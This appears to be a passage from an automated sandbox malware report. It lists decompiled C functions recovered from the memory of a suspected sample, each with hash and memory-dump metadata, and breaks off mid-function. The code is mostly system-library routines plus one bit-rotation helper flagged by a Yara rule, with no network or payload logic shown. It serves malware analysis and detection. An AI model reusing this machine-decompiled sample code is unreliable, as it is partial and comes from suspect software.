                            				void* _t78;
                            				signed int _t79;
                            				signed int _t80;
                            
                            				_v8 =  *0x180d360 ^ _t80;
                            				_t75 = 0x100;
                            				_v64 = _v64 & 0x00000000;
                            				_v76 = __ecx;
                            				_t79 = 0;
                            				_t68 = 0;
                            				_v72 = 1;
                            				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                            				_t77 = 0;
                            				if(L01726C59(__ecx[2], 0x100, __eflags) != 0) {
                            					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                            					if(_t79 != 0 && E01796BA3() != 0) {
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0x1f0003);
                            						_push( &_v64);
                            						if(E01759980() >= 0) {
                            							E01732280(_t56, 0x1808778);
                            							_t77 = 1;
                            							_t68 = 1;
                            							if( *0x1808774 == 0) {
                            								asm("cdq");
                            								 *(_t79 + 0xf70) = _v64;
                            								 *(_t79 + 0xf74) = 0x100;
                            								_t75 = 0;
                            								_t73 = 4;
                            								_v60 =  &_v68;
                            								_v52 = _t73;
                            								_v36 = _t73;
                            								_t74 = _v76;
                            								_v44 =  &_v72;
                            								 *0x1808774 = 1;
                            								_v56 = 0;
                            								_v28 = _t74[2];
                            								_v48 = 0;
                            								_v20 = ( *_t74 & 0x0000ffff) + 2;
                            								_v40 = 0;
                            								_v32 = 0;
                            								_v24 = 0;
                            								_v16 = 0;
                            								if(L0171B6F0(0x16fc338, 0x16fc288, 3,  &_v60) == 0) {
                            									_v80 = _v80 | 0xffffffff;
                            									_push( &_v84);
                            									_push(0);
                            									_push(_v64);
                            									_v84 = 0xfa0a1f00;
                            									E01759520();
                            								}
                            							}
                            						}
                            					}
                            				}
                            				if(_v64 != 0) {
                            					_push(_v64);
                            					E017595D0();
                            					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                            					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                            				}
                            				if(_t77 != 0) {
                            					L0172FFB0(_t68, _t77, 0x1808778);
                            				}
                            				_pop(_t78);
                            				return L0175B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1ec21e4345f3f9c253710fce0d179541076bb1f43042565b47b744d50caf57f
                            • Instruction ID: 0182f5424c5886654deb9742b38a8bf02394943a2794153a39a400c8b3556132
                            • Opcode Fuzzy Hash: e1ec21e4345f3f9c253710fce0d179541076bb1f43042565b47b744d50caf57f
                            • Instruction Fuzzy Hash: 7541AFB1D002099FDB15CFA9D840BFEFBF4EF48704F14822AE914A3244DB749A05CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00A81030(signed char* __eax) {
                            				signed char* _t37;
                            				unsigned int _t55;
                            				unsigned int _t65;
                            				unsigned int _t73;
                            				unsigned int _t81;
                            				unsigned int _t88;
                            				signed char _t94;
                            				signed char _t97;
                            				signed char _t100;
                            
                            				_t37 = __eax;
                            				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                            				_t94 = __eax[0xb];
                            				if((_t94 & 0x00000001) != 0) {
                            					_t65 = _t65 | 0x80000000;
                            				}
                            				_t37[0xc] = _t65 >> 0x18;
                            				_t37[0xf] = _t65;
                            				_t37[0xd] = _t65 >> 0x10;
                            				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                            				_t97 = _t37[7];
                            				_t37[0xe] = _t65 >> 8;
                            				if((_t97 & 0x00000001) != 0) {
                            					_t73 = _t73 | 0x80000000;
                            				}
                            				_t37[8] = _t73 >> 0x18;
                            				_t37[0xb] = _t73;
                            				_t37[9] = _t73 >> 0x10;
                            				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                            				_t100 = _t37[3];
                            				_t37[0xa] = _t73 >> 8;
                            				if((_t100 & 0x00000001) != 0) {
                            					_t81 = _t81 | 0x80000000;
                            				}
                            				_t37[4] = _t81 >> 0x18;
                            				_t37[7] = _t81;
                            				_t37[5] = _t81 >> 0x10;
                            				_t55 = _t81;
                            				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                            				 *_t37 = _t88 >> 0x18;
                            				_t37[1] = _t88 >> 0x10;
                            				_t37[6] = _t55 >> 8;
                            				_t37[2] = _t88 >> 8;
                            				_t37[3] = _t88;
                            				return _t37;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                            • Instruction ID: b7dacaf289125c92ff12086c8a3fe17c54bc45dd60cc701e01d6cefe78b06550
                            • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                            • Instruction Fuzzy Hash: 1B3180116587F10ED30E836D08BDA75AED18E9720174EC2FEDADA6F2F3C0888409D3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E01715210(intOrPtr _a4, void* _a8) {
                            				void* __ecx;
                            				intOrPtr _t31;
                            				signed int _t32;
                            				signed int _t33;
                            				intOrPtr _t35;
                            				signed int _t52;
                            				void* _t54;
                            				void* _t56;
                            				unsigned int _t59;
                            				signed int _t60;
                            				void* _t61;
                            
                            				_t61 = E017152A5(1);
                            				if(_t61 == 0) {
                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                            					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                            					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                            				} else {
                            					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                            					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                            				}
                            				_t60 = _t59 >> 1;
                            				_t32 = 0x3a;
                            				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                            					_t52 = _t60 + _t60;
                            					if(_a4 > _t52) {
                            						goto L5;
                            					}
                            					if(_t61 != 0) {
                            						asm("lock xadd [esi], eax");
                            						if((_t32 | 0xffffffff) == 0) {
                            							_push( *((intOrPtr*)(_t61 + 4)));
                            							E017595D0();
                            							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                            						}
                            					} else {
                            						E0172EB70(_t54, 0x18079a0);
                            					}
                            					_t26 = _t52 + 2; // 0xddeeddf0
                            					return _t26;
                            				} else {
                            					_t52 = _t60 + _t60;
                            					if(_a4 < _t52) {
                            						if(_t61 != 0) {
                            							asm("lock xadd [esi], eax");
                            							if((_t32 | 0xffffffff) == 0) {
                            								_push( *((intOrPtr*)(_t61 + 4)));
                            								E017595D0();
                            								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                            							}
                            						} else {
                            							E0172EB70(_t54, 0x18079a0);
                            						}
                            						return _t52;
                            					}
                            					L5:
                            					_t33 = E0175F3E0(_a8, _t54, _t52);
                            					if(_t61 == 0) {
                            						E0172EB70(_t54, 0x18079a0);
                            					} else {
                            						asm("lock xadd [esi], eax");
                            						if((_t33 | 0xffffffff) == 0) {
                            							_push( *((intOrPtr*)(_t61 + 4)));
                            							E017595D0();
                            							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                            						}
                            					}
                            					_t35 = _a8;
                            					if(_t60 <= 1) {
                            						L9:
                            						_t60 = _t60 - 1;
                            						 *((short*)(_t52 + _t35 - 2)) = 0;
                            						goto L10;
                            					} else {
                            						_t56 = 0x3a;
                            						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                            							 *((short*)(_t52 + _t35)) = 0;
                            							L10:
                            							return _t60 + _t60;
                            						}
                            						goto L9;
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba29a3dfaf0f004da014a651f41e1c1eb92996ce0e3ff5ac490e1454cbf1e734
                            • Instruction ID: 4105b546fe66a9795f6ebb0ea388e26eb42940198154fbf45c30429154b4bcfc
                            • Opcode Fuzzy Hash: ba29a3dfaf0f004da014a651f41e1c1eb92996ce0e3ff5ac490e1454cbf1e734
                            • Instruction Fuzzy Hash: A6314832245711EBCB269B1CC884F6AF7A5FF62720F104629F9554B299EB70F940C690
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01753D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                            				intOrPtr _v8;
                            				char _v12;
                            				signed short** _t33;
                            				short* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr* _t41;
                            				signed short _t43;
                            				intOrPtr* _t47;
                            				intOrPtr* _t53;
                            				signed short _t57;
                            				intOrPtr _t58;
                            				signed short _t60;
                            				signed short* _t61;
                            
                            				_t47 = __ecx;
                            				_t61 = __edx;
                            				_t60 = ( *__ecx & 0x0000ffff) + 2;
                            				if(_t60 > 0xfffe) {
                            					L22:
                            					return 0xc0000106;
                            				}
                            				if(__edx != 0) {
                            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                            						L5:
                            						E01727B60(0, _t61, 0x16f11c4);
                            						_v12 =  *_t47;
                            						_v12 = _v12 + 0xfff8;
                            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                            						E01727B60(0xfff8, _t61,  &_v12);
                            						_t33 = _a8;
                            						if(_t33 != 0) {
                            							 *_t33 = _t61;
                            						}
                            						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                            						_t53 = _a12;
                            						if(_t53 != 0) {
                            							_t57 = _t61[2];
                            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                            							while(_t38 >= _t57) {
                            								if( *_t38 == 0x5c) {
                            									_t41 = _t38 + 2;
                            									if(_t41 == 0) {
                            										break;
                            									}
                            									_t58 = 0;
                            									if( *_t41 == 0) {
                            										L19:
                            										 *_t53 = _t58;
                            										goto L7;
                            									}
                            									 *_t53 = _t41;
                            									goto L7;
                            								}
                            								_t38 = _t38 - 2;
                            							}
                            							_t58 = 0;
                            							goto L19;
                            						} else {
                            							L7:
                            							_t39 = _a16;
                            							if(_t39 != 0) {
                            								 *_t39 = 0;
                            								 *((intOrPtr*)(_t39 + 4)) = 0;
                            								 *((intOrPtr*)(_t39 + 8)) = 0;
                            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                            							}
                            							return 0;
                            						}
                            					}
                            					_t61 = _a4;
                            					if(_t61 != 0) {
                            						L3:
                            						_t43 = L01734620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                            						_t61[2] = _t43;
                            						if(_t43 == 0) {
                            							return 0xc0000017;
                            						}
                            						_t61[1] = _t60;
                            						 *_t61 = 0;
                            						goto L5;
                            					}
                            					goto L22;
                            				}
                            				_t61 = _a4;
                            				if(_t61 == 0) {
                            					return 0xc000000d;
                            				}
                            				goto L3;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8be4b443879c0450c20b3d9ee6abb86266c0709645d757f16c71ee273ac04f88
                            • Instruction ID: 46fb0dd6e0ff7dcb23aa2daf8f0aeb7e62562a92df776cd361ec10105d51bef0
                            • Opcode Fuzzy Hash: 8be4b443879c0450c20b3d9ee6abb86266c0709645d757f16c71ee273ac04f88
                            • Instruction Fuzzy Hash: 2731DE31600615DBD7699F2EC841A7AFBF5FF99780B0580AEE945CB360EBB0D881D790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E0173C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                            				signed int* _v8;
                            				char _v16;
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t33;
                            				signed char _t43;
                            				signed char _t48;
                            				signed char _t62;
                            				void* _t63;
                            				intOrPtr _t69;
                            				intOrPtr _t71;
                            				unsigned int* _t82;
                            				void* _t83;
                            
                            				_t80 = __ecx;
                            				_t82 = __edx;
                            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                            				_t62 = _t33 >> 0x00000001 & 0x00000001;
                            				if((_t33 & 0x00000001) != 0) {
                            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                            					if(E01737D50() != 0) {
                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            					} else {
                            						_t43 = 0x7ffe0386;
                            					}
                            					if( *_t43 != 0) {
                            						_t43 = E017E8D34(_v8, _t80);
                            					}
                            					E01732280(_t43, _t82);
                            					if( *((char*)(_t80 + 0xdc)) == 0) {
                            						L0172FFB0(_t62, _t80, _t82);
                            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                            						_t30 = _t80 + 0xd0; // 0xd0
                            						_t83 = _t30;
                            						E017E8833(_t83,  &_v16);
                            						_t81 = _t80 + 0x90;
                            						L0172FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                            						_t63 = 0;
                            						_push(0);
                            						_push(_t83);
                            						_t48 = E0175B180();
                            						if(_a4 != 0) {
                            							E01732280(_t48, _t81);
                            						}
                            					} else {
                            						_t69 = _v8;
                            						_t12 = _t80 + 0x98; // 0x98
                            						_t13 = _t69 + 0xc; // 0x575651ff
                            						E0173BB2D(_t13, _t12);
                            						_t71 = _v8;
                            						_t15 = _t80 + 0xb0; // 0xb0
                            						_t16 = _t71 + 8; // 0x8b000cc2
                            						E0173BB2D(_t16, _t15);
                            						E0173B944(_v8, _t62);
                            						 *((char*)(_t80 + 0xdc)) = 0;
                            						L0172FFB0(0, _t80, _t82);
                            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                            						 *(_t80 + 0xde) = 0;
                            						if(_a4 == 0) {
                            							_t25 = _t80 + 0x90; // 0x90
                            							L0172FFB0(0, _t80, _t25);
                            						}
                            						_t63 = 1;
                            					}
                            					return _t63;
                            				}
                            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                            				if(_a4 == 0) {
                            					_t24 = _t80 + 0x90; // 0x90
                            					L0172FFB0(0, __ecx, _t24);
                            				}
                            				return 0;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                            • Instruction ID: 830743a260524f4313af58dd765ca0952eeb196fb22fac5dced4cb0263557a92
                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                            • Instruction Fuzzy Hash: F6317AB160558BBED706EBB4C884BE9FBA4BF96200F04415BC51C97207CB346A4AD7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E01797016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                            				signed int _v8;
                            				char _v588;
                            				intOrPtr _v592;
                            				intOrPtr _v596;
                            				signed short* _v600;
                            				char _v604;
                            				short _v606;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed short* _t55;
                            				void* _t56;
                            				signed short* _t58;
                            				signed char* _t61;
                            				char* _t68;
                            				void* _t69;
                            				void* _t71;
                            				void* _t72;
                            				signed int _t75;
                            
                            				_t64 = __edx;
                            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                            				_v8 =  *0x180d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                            				_t55 = _a16;
                            				_v606 = __ecx;
                            				_t71 = 0;
                            				_t58 = _a12;
                            				_v596 = __edx;
                            				_v600 = _t58;
                            				_t68 =  &_v588;
                            				if(_t58 != 0) {
                            					_t71 = ( *_t58 & 0x0000ffff) + 2;
                            					if(_t55 != 0) {
                            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                            					}
                            				}
                            				_t8 = _t71 + 0x2a; // 0x28
                            				_t33 = _t8;
                            				_v592 = _t8;
                            				if(_t71 <= 0x214) {
                            					L6:
                            					 *((short*)(_t68 + 6)) = _v606;
                            					if(_t64 != 0xffffffff) {
                            						asm("cdq");
                            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                            						 *((char*)(_t68 + 0x28)) = _a4;
                            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                            						 *((char*)(_t68 + 0x29)) = _a8;
                            						if(_t71 != 0) {
                            							_t22 = _t68 + 0x2a; // 0x2a
                            							_t64 = _t22;
                            							E01796B4C(_t58, _t22, _t71,  &_v604);
                            							if(_t55 != 0) {
                            								_t25 = _v604 + 0x2a; // 0x2a
                            								_t64 = _t25 + _t68;
                            								E01796B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                            							}
                            							if(E01737D50() == 0) {
                            								_t61 = 0x7ffe0384;
                            							} else {
                            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            							}
                            							_push(_t68);
                            							_push(_v592 + 0xffffffe0);
                            							_push(0x402);
                            							_push( *_t61 & 0x000000ff);
                            							E01759AE0();
                            						}
                            					}
                            					_t35 =  &_v588;
                            					if( &_v588 != _t68) {
                            						_t35 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                            					}
                            					L16:
                            					_pop(_t69);
                            					_pop(_t72);
                            					_pop(_t56);
                            					return L0175B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                            				}
                            				_t68 = L01734620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                            				if(_t68 == 0) {
                            					goto L16;
                            				} else {
                            					_t58 = _v600;
                            					_t64 = _v596;
                            					goto L6;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 50db6c35ea72beebf843ce625a3e2c743fa170401bfa7d4de72b5e58e3564a8f
                            • Instruction ID: 6949ee233f0daf10afcfe792b68cdfd4668f5c43feec3554f920a2dfa110a137
                            • Opcode Fuzzy Hash: 50db6c35ea72beebf843ce625a3e2c743fa170401bfa7d4de72b5e58e3564a8f
                            • Instruction Fuzzy Hash: 5C31E4B26047419BC728DF2CD844A6AF7E5FFC8700F044A29F99587690E730E908CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E017461A0(signed int* __ecx) {
                            				intOrPtr _v8;
                            				char _v12;
                            				intOrPtr* _v16;
                            				intOrPtr _v20;
                            				intOrPtr _t30;
                            				intOrPtr _t31;
                            				void* _t32;
                            				intOrPtr _t33;
                            				intOrPtr _t37;
                            				intOrPtr _t49;
                            				signed int _t51;
                            				intOrPtr _t52;
                            				signed int _t54;
                            				void* _t59;
                            				signed int* _t61;
                            				intOrPtr* _t64;
                            
                            				_t61 = __ecx;
                            				_v12 = 0;
                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                            				_v16 = __ecx;
                            				_v8 = 0;
                            				if(_t30 == 0) {
                            					L6:
                            					_t31 = 0;
                            					L7:
                            					return _t31;
                            				}
                            				_t32 = _t30 + 0x5d8;
                            				if(_t32 == 0) {
                            					goto L6;
                            				}
                            				_t59 = _t32 + 0x30;
                            				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                            					goto L6;
                            				}
                            				if(__ecx != 0) {
                            					 *((intOrPtr*)(__ecx)) = 0;
                            					 *((intOrPtr*)(__ecx + 4)) = 0;
                            				}
                            				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                            					_t51 =  *(_t32 + 0x10);
                            					_t33 = _t32 + 0x10;
                            					_v20 = _t33;
                            					_t54 =  *(_t33 + 4);
                            					if((_t51 | _t54) == 0) {
                            						_t37 = L01745E50(0x16f67cc, 0, 0,  &_v12);
                            						if(_t37 != 0) {
                            							goto L6;
                            						}
                            						_t52 = _v8;
                            						asm("lock cmpxchg8b [esi]");
                            						_t64 = _v16;
                            						_t49 = _t37;
                            						_v20 = 0;
                            						if(_t37 == 0) {
                            							if(_t64 != 0) {
                            								 *_t64 = _v12;
                            								 *((intOrPtr*)(_t64 + 4)) = _t52;
                            							}
                            							E017E9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                            							_t31 = 1;
                            							goto L7;
                            						}
                            						L0171F7C0(_t52, _v12, _t52, 0);
                            						if(_t64 != 0) {
                            							 *_t64 = _t49;
                            							 *((intOrPtr*)(_t64 + 4)) = _v20;
                            						}
                            						L12:
                            						_t31 = 1;
                            						goto L7;
                            					}
                            					if(_t61 != 0) {
                            						 *_t61 = _t51;
                            						_t61[1] = _t54;
                            					}
                            					goto L12;
                            				} else {
                            					goto L6;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0eb3a9d97bce06cdd0b45c8f4289c3c312429eb12d088d4cd337c7c14fb5d8f3
                            • Instruction ID: 50b7d61e4ee9b3bbc9eb5064700cb645ea002d0d827ad6717528352f502ecde0
                            • Opcode Fuzzy Hash: 0eb3a9d97bce06cdd0b45c8f4289c3c312429eb12d088d4cd337c7c14fb5d8f3
                            • Instruction Fuzzy Hash: 053169716093018FE324DF1DC800B26FBE4FB88B04F15496DFA999B251E7B0E804CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E0171AA16(signed short* __ecx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				signed short _v16;
                            				intOrPtr _v20;
                            				signed short _v24;
                            				signed short _v28;
                            				void* _v32;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t25;
                            				signed short _t38;
                            				signed short* _t42;
                            				signed int _t44;
                            				signed short* _t52;
                            				signed short _t53;
                            				signed int _t54;
                            
                            				_v8 =  *0x180d360 ^ _t54;
                            				_t42 = __ecx;
                            				_t44 =  *__ecx & 0x0000ffff;
                            				_t52 =  &(__ecx[2]);
                            				_t51 = _t44 + 2;
                            				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                            					L4:
                            					_t25 =  *0x1807b9c; // 0x0
                            					_t53 = L01734620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                            					__eflags = _t53;
                            					if(_t53 == 0) {
                            						L3:
                            						return L0175B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                            					} else {
                            						E0175F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                            						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                            						L2:
                            						_t51 = 4;
                            						if(L01726C59(_t53, _t51, _t58) != 0) {
                            							_t28 = L01745E50(0x16fc338, 0, 0,  &_v32);
                            							__eflags = _t28;
                            							if(_t28 == 0) {
                            								_t38 = ( *_t42 & 0x0000ffff) + 2;
                            								__eflags = _t38;
                            								_v24 = _t53;
                            								_v16 = _t38;
                            								_v20 = 0;
                            								_v12 = 0;
                            								E0174B230(_v32, _v28, 0x16fc2d8, 1,  &_v24);
                            								_t28 = L0171F7A0(_v32, _v28);
                            							}
                            							__eflags = _t53 -  *_t52;
                            							if(_t53 !=  *_t52) {
                            								_t28 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                            							}
                            						}
                            						goto L3;
                            					}
                            				}
                            				_t53 =  *_t52;
                            				_t44 = _t44 >> 1;
                            				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                            				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                            					goto L4;
                            				}
                            				goto L2;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e2bebf9ebacf2e04b622e6cce2dd444ec51bdac3f068201751d975c40c6a8d2
                            • Instruction ID: 583c9571bf91c9e826a4f45c8ac63d933a01d45f6e2c2b10289531ef82b91f27
                            • Opcode Fuzzy Hash: 7e2bebf9ebacf2e04b622e6cce2dd444ec51bdac3f068201751d975c40c6a8d2
                            • Instruction Fuzzy Hash: 5731D572A0122AABCF159FA8CD81A7FF7B9EF44700F014069F906E7254E7749E11DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E01754A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				signed int* _v12;
                            				char _v13;
                            				signed int _v16;
                            				char _v21;
                            				signed int* _v24;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t29;
                            				signed int* _t32;
                            				signed int* _t41;
                            				signed int _t42;
                            				void* _t43;
                            				intOrPtr* _t51;
                            				void* _t52;
                            				signed int _t53;
                            				signed int _t58;
                            				void* _t59;
                            				signed int _t60;
                            				signed int _t62;
                            
                            				_t49 = __edx;
                            				_t62 = (_t60 & 0xfffffff8) - 0xc;
                            				_t26 =  *0x180d360 ^ _t62;
                            				_v8 =  *0x180d360 ^ _t62;
                            				_t41 = __ecx;
                            				_t51 = __edx;
                            				_v12 = __ecx;
                            				if(_a4 == 0) {
                            					if(_a8 != 0) {
                            						goto L1;
                            					}
                            					_v13 = 1;
                            					E01732280(_t26, 0x1808608);
                            					_t58 =  *_t41;
                            					if(_t58 == 0) {
                            						L11:
                            						L0172FFB0(_t41, _t51, 0x1808608);
                            						L2:
                            						 *0x180b1e0(_a4, _a8);
                            						_t42 =  *_t51();
                            						if(_t42 == 0) {
                            							_t29 = 0;
                            							L5:
                            							_pop(_t52);
                            							_pop(_t59);
                            							_pop(_t43);
                            							return L0175B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                            						}
                            						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                            						if(_v21 != 0) {
                            							_t53 = 0;
                            							E01732280(_t28, 0x1808608);
                            							_t32 = _v24;
                            							if( *_t32 == _t58) {
                            								 *_t32 = _t42;
                            								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                            								if(_t58 != 0) {
                            									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                            									asm("sbb edi, edi");
                            									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                            								}
                            							}
                            							L0172FFB0(_t42, _t53, 0x1808608);
                            							if(_t53 != 0) {
